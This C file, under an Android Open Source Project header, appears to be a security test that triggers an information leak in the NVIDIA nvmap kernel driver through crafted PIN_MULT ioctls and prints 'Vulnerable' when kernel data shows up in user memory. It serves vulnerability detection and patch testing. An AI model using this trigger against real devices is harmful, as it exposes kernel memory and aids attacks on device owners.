/*
 * Copyright (C) 2017 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
#define _GNU_SOURCE
#include <unistd.h>
#include <errno.h>
#include <stdio.h>
#include <dirent.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <stdio.h>
#include <string.h>
#include <dlfcn.h>
#include <sys/time.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/resource.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sched.h>


struct nvmap_handle_param {
	__u32 handle;		/* nvmap handle */
	__u32 param;		/* size/align/base/heap etc. */
	unsigned long result;	/* returns requested info*/
};

struct nvmap_create_handle {
	union {
		__u32 id;	/* FromId */
		__u32 size;	/* CreateHandle */
		__s32 fd;	/* DmaBufFd or FromFd */
	};
	__u32 handle;		/* returns nvmap handle */
};

struct nvmap_pin_handle {
	__u32 *handles;		/* array of handles to pin/unpin */
	unsigned long *addr;	/* array of addresses to return */
	__u32 count;		/* number of entries in handles */
};

struct nvmap_alloc_handle {
	__u32 handle;		/* nvmap handle */
	__u32 heap_mask;	/* heaps to allocate from */
	__u32 flags;		/* wb/wc/uc/iwb etc. */
	__u32 align;		/* min alignment necessary */
};

struct nvmap_pin_handle_32 {
	__u32 handles;		/* array of handles to pin/unpin */
	__u32 addr;		/*  array of addresses to return */
	__u32 count;		/* number of entries in handles */
};

struct nvmap_map_caller_32 {
	__u32 handle;		/* nvmap handle */
	__u32 offset;		/* offset into hmem; should be page-aligned */
	__u32 length;		/* number of bytes to map */
	__u32 flags;		/* maps as wb/iwb etc. */
	__u32 addr;		/* user pointer*/
};

#define NVMAP_IOC_MAGIC 'N'
#define NVMAP_IOC_CREATE  _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
#define NVMAP_IOC_PIN_MULT      _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle)
#define NVMAP_IOC_ALLOC    _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
#define NVMAP_IOC_PIN_MULT_32   _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle_32)
#define NVMAP_IOC_MMAP_32    _IOWR(NVMAP_IOC_MAGIC, 5, struct nvmap_map_caller_32)

/* common carveout heaps */
#define NVMAP_HEAP_CARVEOUT_IRAM    (1ul<<29)
#define NVMAP_HEAP_CARVEOUT_VPR     (1ul<<28)
#define NVMAP_HEAP_CARVEOUT_TSEC    (1ul<<27)
#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)

#define NVMAP_HEAP_CARVEOUT_MASK    (NVMAP_HEAP_IOVMM - 1)

/* allocation flags */
#define NVMAP_HANDLE_UNCACHEABLE     (0x0ul << 0)
#define NVMAP_HANDLE_WRITE_COMBINE   (0x1ul << 0)
#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
#define NVMAP_HANDLE_CACHEABLE       (0x3ul << 0)
#define NVMAP_HANDLE_CACHE_FLAG      (0x3ul << 0)

#define NVMAP_HANDLE_SECURE          (0x1ul << 2)
#define NVMAP_HANDLE_KIND_SPECIFIED  (0x1ul << 3)
#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
#define NVMAP_HANDLE_ZEROED_PAGES    (0x1ul << 5)
#define NVMAP_HANDLE_PHYS_CONTIG     (0x1ul << 6)
#define NVMAP_HANDLE_CACHE_SYNC      (0x1ul << 7)


int g_fd = -1;

int open_driver() {
    char* dev_path = "/dev/nvmap";
    g_fd = open(dev_path, O_RDWR);
    return g_fd;
}


int main(int argc, char**argv) {
    if (open_driver() < 0) {
        return -1;
    }
    
    int i;
    int* handles = mmap((void*)0x20000000, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    memset(handles, 0x42, 0x1000);
    for (i = 0; i < 2; ++i) {
        struct nvmap_create_handle op = {0};
        op.size = 0x1000;
        ioctl(g_fd, NVMAP_IOC_CREATE, &op);
        handles[i] = op.handle;
        struct nvmap_alloc_handle alloc = {0};
        alloc.align = 0x1000;
        alloc.handle = op.handle;
        alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
        alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
        ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
    }

    void* leak_addr = (void*) 0x10001000;
    void* mmap_addr = mmap(leak_addr, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    memset(leak_addr, 0x41, 0x1000);

    unsigned long leaked_data = 0;
    struct nvmap_pin_handle_32 pin = {0};
    pin.count = 2;
    pin.handles = (unsigned int) handles;
    struct nvmap_pin_handle err_pin = {0};
    err_pin.count = 0;
    err_pin.handles = handles;
    err_pin.addr = leak_addr + 8;

    ioctl(g_fd, NVMAP_IOC_PIN_MULT, &err_pin);  // construct op.addr
    ioctl(g_fd, NVMAP_IOC_PIN_MULT_32, &pin);

    for (i = 0; i < 10; ++i) {
        if(((int*)leak_addr)[i] != 0x41414141 && 0 == leaked_data) {
          leaked_data = (unsigned long)((int*)leak_addr) + i;
        }
    }

    if (leaked_data) {
        printf("Vulnerable");
    }
    return 0;
}